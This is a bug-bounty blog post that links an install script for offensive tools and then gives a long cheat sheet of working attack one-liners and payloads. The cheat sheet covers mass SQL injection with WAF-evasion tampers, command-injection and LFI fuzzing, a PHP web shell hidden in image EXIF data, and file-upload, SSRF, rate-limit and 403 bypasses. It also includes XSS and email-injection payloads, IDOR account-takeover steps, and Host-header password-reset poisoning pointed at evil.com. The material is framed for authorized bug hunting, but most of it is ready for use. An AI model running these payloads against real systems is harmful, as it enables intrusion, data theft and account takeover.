Penetration Testing Tools, ML and Linux Tutorials
  • Data Science
    • Artificial Intelligence
    • Data Analyst
    • Deep Learning
    • Machine Learning
  • Kali
    • Exploits
    • OSINT
    • Tools
    • Bug Bounty
    • Resources
  • Linux
    • DevOps
    • Docker
    • Kubernetes
    • Git
  • Forensics
    • Cyber Forensics
    • Digital Forensics
    • Linux Forensics
    • Network Forensics
    • Threat Analyst
    • Incident Response
  • SQL
  • CVE
  • Share
  • News
  • Services
    • CrackMyHash
  • Small Business
  • Resources
  • White Papers
  • Crypto News
  • Programming
    • Python
    • NodeJS
    • Java
    • Javascript
    • PHP
    • Agile
    • TypeScript
  • Android
  • SEO
  • Microsoft
    • Azure
    • Dot Net
    • Powershell
  • Networking
Penetration Testing Tools, ML and Linux Tutorials Penetration Testing Tools, ML and Linux Tutorials
Penetration Testing Tools, ML and Linux Tutorials Penetration Testing Tools, ML and Linux Tutorials
Penetration Testing Tools, ML and Linux Tutorials Penetration Testing Tools, ML and Linux Tutorials
  • Data Science
    • Artificial Intelligence
    • Data Analyst
    • Deep Learning
    • Machine Learning
    Data Science Interview Preparation
    Data Science Command Line
    Machine Learning on Geographical Data
    Data Science Squad Roadmap
    Previous Next
  • Kali
    • Exploits
    • OSINT
    • Tools
    • Bug Bounty
    • Resources
    RedCloud OS
    WordPress Social Login and Register Authentication Bypass
    Wireless Pentesting Cheat Sheet
    Kali Linux Cheat Sheet
    Previous Next
  • Linux
    • DevOps
    • Docker
    • Kubernetes
    • Git
    DevOps Learning resources
    Linux Ultimate Guide
    DevOps Roadmap 2022
    Collection of tips on Linux
    Previous Next
  • Forensics
    • Cyber Forensics
    • Digital Forensics
    • Linux Forensics
    • Network Forensics
    • Threat Analyst
    • Incident Response
    Awesome Forensics
    Awesome Event IDs
    Digital Forensics Guide
    Digital Forensics and Incident Response SOC
    Previous Next
  • SQL
    SQL Cheat Sheet
    The Rust SQL Toolkit
    Postgres to Elasticsearch sync
    Awesome SQL Server
    Universal Command Line interface for SQL databases
    Previous Next
  • CVE
  • Share
  • News
  • Services
    • CrackMyHash
Penetration Testing Tools, ML and Linux Tutorials Penetration Testing Tools, ML and Linux Tutorials
  • Data Science
    • Artificial Intelligence
    • Data Analyst
    • Deep Learning
    • Machine Learning
    Data Science Interview Preparation
    Data Science Command Line
    Machine Learning on Geographical Data
    Data Science Squad Roadmap
    Previous Next
  • Kali
    • Exploits
    • OSINT
    • Tools
    • Bug Bounty
    • Resources
    RedCloud OS
    WordPress Social Login and Register Authentication Bypass
    Wireless Pentesting Cheat Sheet
    Kali Linux Cheat Sheet
    Previous Next
  • Linux
    • DevOps
    • Docker
    • Kubernetes
    • Git
    DevOps Learning resources
    Linux Ultimate Guide
    DevOps Roadmap 2022
    Collection of tips on Linux
    Previous Next
  • Forensics
    • Cyber Forensics
    • Digital Forensics
    • Linux Forensics
    • Network Forensics
    • Threat Analyst
    • Incident Response
    Awesome Forensics
    Awesome Event IDs
    Digital Forensics Guide
    Digital Forensics and Incident Response SOC
    Previous Next
  • SQL
    SQL Cheat Sheet
    The Rust SQL Toolkit
    Postgres to Elasticsearch sync
    Awesome SQL Server
    Universal Command Line interface for SQL databases
    Previous Next
  • CVE
  • Share
  • News
  • Services
    • CrackMyHash
Bug Bounty

Bug bounty builder Project

Stella Sebastian
Posted by Stella Sebastian January 4, 2022

superior_hosting_service

Awesome Bug bounty builder Project – ALL common Tools for find your Vulnerabilities.


Installation:

$ git clone https://github.com/0xJin/awesome-bugbounty-builder.git
$ cd awesome-bugbounty-builder/
$ chmod +x awesome-bugbounty-builder.sh
$ ./awesome-bugbounty-builder.sh

Tools You will find here

  • Amass
  • Sublister
  • Gauplus
  • HTTPX
  • Gf + patterns
  • Kxss
  • Sqlmap
  • Commix
  • Tplmap
  • HYDRA
  • John the ripper
  • Evilwinrm
  • Arjun
  • Paramspider
  • NoSQLmap
  • NMAP
  • Nikto
  • FFUF
  • 403-Bypass
  • Gobuster
  • Seclists
  • Hash-identifier
  • XSSMAP
  • Smuggler
  • SSRFmap
  • Gmapsapiscanner
  • Qsreplace
  • exiftool
  • XSRFProbe
  • XXE Exploiter
  • Rush
  • Rustscan
  • LFISuite
  • Wapiti

Bug Bounty TIPS and Usage of tools + One Liner TIPS :


ONE-LINER RECON for FUZZ XSS :

$ amass enum -brute -passive -d example.com | httpx -silent -status-code | tee domain.txt
$ cat domain.txt | gauplus -random-agent -t 200 | gf xss | kxss | tee domain2.txt

FUZZ all SUBDOMAINS with FUFF ONE-LINER :

$ amass enum -brute -passive -d http://example.com | sed 's#*.# #g' | httpx -silent -threads 10 | xargs -I@ sh -c 'ffuf -w wordlist.txt -u @/FUZZ -mc 200'

COMMAND Injection with FUFF ONE-LINER :

$ cat subdomains.txt | httpx -silent -status-code | gauplus -random-agent -t 200 | qsreplace “aaa%20%7C%7C%20id%3B%20x” > fuzzing.txt
$ ffuf -ac -u FUZZ -w fuzzing.txt -replay-proxy 127.0.0.1:8080
// search for ”uid” in burp proxy intercept 
// You can use the same query for search SSTI in qsreplase add "{{7*7}}" and search on burp for '49'

SQL Injection Tips :

// **MASS SQL injection**
$ amass enum -brute -passive -d example.com | httpx -silent -status-code | tee domain.txt
$ cat domain.txt | gauplus -random-agent -t 200 | gf sqli | tee domain2.txt
$ sqlmap -m domain2.txt -dbs --batch --random-agent
// **SQL Injection headers**
$ sqlmap -u "http://redacted.com" --header="X-Forwarded-For: 1*" --dbs --batch --random-agent --threads=10
// **SQL Injection bypass 401**
$ sqlmap -u "http://redacted.com" --dbs --batch --random-agent --forms --ignore-code=401

// PRO TIPS FOR BYPASSING WAF, add to SQLmap this tamper
--tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,ifnull2ifisnull,modsecurityversioned,space2comment,randomcase

XSS + SQLi + CSTI/SSTI

Payload: '"><svg/onload=prompt(5);>{{7*7}}

EXIFTOOL + file UPLOAD Tips :

$ exiftool -Comment="<?php echo 'Command:'; if($_POST){system($_POST['cmd']);} __halt_compiler();" img.jpg
// File Upload bypass
file.php%20
file.php%0a
file.php%00
file.php%0d%0a
file.php/
file.php.\
file.
file.php....
file.pHp5....
file.png.php
file.png.pHp5
file.php%00.png
file.php\x00.png
file.php%0a.png
file.php%0d%0a.png
flile.phpJunk123png
file.png.jpg.php
file.php%00.png%00.jpg

Open Redirect Tips ONE-LINER :

$ export LHOST="http://localhost"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'

LFI ONE-LINER :

$ gauplus -random-agent -t 200 http://redacted.com | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'

Best SSRF Bypass :

http://127.1/
http://0000::1:80/
http://[::]:80/
http://2130706433/
http://whitelisted@127.0.0.1
http://0x7f000001/
http://017700000001
http://0177.00.00.01

Email Attacks :

// **Header Injection**
"%0d%0aContent-Length:%200%0d%0a%0d%0a"@example.com
"recipient@test.com>\r\nRCPT TO:<victim+"@test.com
// **XSS Injection**
test+(<script>alert(0)</script>)@example.com
test@example(<script>alert(0)</script>).com
"<script>alert(0)</script>"@example.com
// **SST Injection**
"<%= 7 * 7 %>"@example.com
test+(${{7*7}})@example.com
// **SQL Injection**
"' OR 1=1 -- '"@example.com
"mail'); SLEEP(5);--"@example.com
// **SSRF Attack**
john.doe@abc123.burpcollaborator.net
john.doe@[127.0.0.1]

XSS Payload for Image

<img src=x onerror=alert('XSS')>.png
"><img src=x onerror=alert('XSS')>.png
"><svg onmouseover=alert(1)>.svg
<<script>alert('xss')<!--a-->a.png

My XSS for bypass CLOUDFLARE with default rules

"/><svg+svg+svg\/\/On+OnLoAd=confirm(1)>

Find hidden params in javascript files:

$ amass enum -passive -brute -d redacted.com | gau | egrep -v '(.css|.svg)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=xss/g'); echo -e "\e[1;33m$url\n\e[1;32m$vars"; done

IDOR to Account TakeOver quickly :

~Create an account 
~In the reset field set a password and intercept with burp
~GET /user/2099/reset (change to 2098) send the request
~Take the token 
~Cookie editor and use this token
~Reload page

For API-KEYS :

$ use gauplus and paramspider , after you can grep words like "api" or "key" and use gmapsapiscanner for see if is vulnerable.

Find sensitive information with GF tool :

$ gauplus redacted.com -subs | cut -d"?" -f1 | grep -E "\.js+(?:on|)$" | tee domains.txt
sort -u domains.txt | fff -s 200 -o out/
$ for i in `gf -list`; do [[ ${i} =~ "_secrets"* ]] && gf ${i}; done

Bypass RATE-LIMIT by adding :

X-Originating-IP: IP
X-Forwarded-For: IP
X-Remote-IP: IP
X-Remote-Addr: IP
X-Client-IP: IP
X-Host: IP
X-Forwared-Host: IP

Find Access Token with FFUF and GAUPLUS :

$ cat domains.txt | sed 's/https\?:\/\///' | gau > domains2.txt
$ cat domains2.txt | grep -P "\w+\.js(\?|$)" | sort -u > jsurls.txt
$ ffuf -mc 200 w jsurls.txt:HFUZZ -u HFUZZ -replay-proxy http://127.0.0.1:8080
// Use Scan Check Builder Burp extension, add passive profile to extract “accessToken” or “access_token”
// Extract found tokens and validate with https://github.com/streaak/keyhacks

Find CORS vulnerabilities :

$ amass enum -d redacted.com | httpx -threads 300 -follow-redirects -silent | rush -j200 'curl -m5 -s -I -H "Origin: evil.com" {} | [[ $(grep -c "evil.com") -gt 0 ]] && printf "\n3[0;32m[VUL TO CORS] 3[0m{}"' 2>/dev/null

Bypass 403 and 401 :

X-Original-URL: /admin
X-Override-URL: /admin
X-Rewrite-URL: /admin

Password poisoning bypass to account takeover :

// Request
POST https://target.com/password-reset?user=123 HTTP/1.1
Host: evil.com

// If you receive a link this works!

Best Wordlists :

https://github.com/six2dez/OneListForAll/releases
https://github.com/Karanxa/Bug-Bounty-Wordlists

Github Link
Active Directory Exploitation Cheat Sheet

Tags: Account Takeover Bug Bounty bug hunter SQL injection SQLMap vulnerabilities XXE
0 Shares
Share on Facebook Share on Twitter Share on Pinterest Share on Email
Stella Sebastian January 4, 2022
Previous Article Internet Computer Price Prediction
Next Article Tezos Coin Price Prediction

Leave a Reply

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Latest Posts

RedCloud OS

July 8, 2023

WordPress Social Login and Register Authentication Bypass

June 30, 2023

Wireless Pentesting Cheat Sheet

June 27, 2023

Kali Linux Cheat Sheet

April 21, 2023
HostnExtra Ads
Neevahost ad post

You Might Also Enjoy

Resources

Kali Linux Cheat Sheet

April 21, 2023
Tools

Process Injection Enumeration Tool

December 20, 2022
Resources

Cloud Security Attacks

November 4, 2022
Exploits

Microsoft Edge Privilege Vulnerability

October 23, 2022
Load More
  • ABOUT
  • ADVERTISEMENT
  • TEAM
  • JOBS
  • CONTACT
  • PRIVACY POLICY
  • DISCLOSURE

© 2021 Reconshell All Rights Reserved.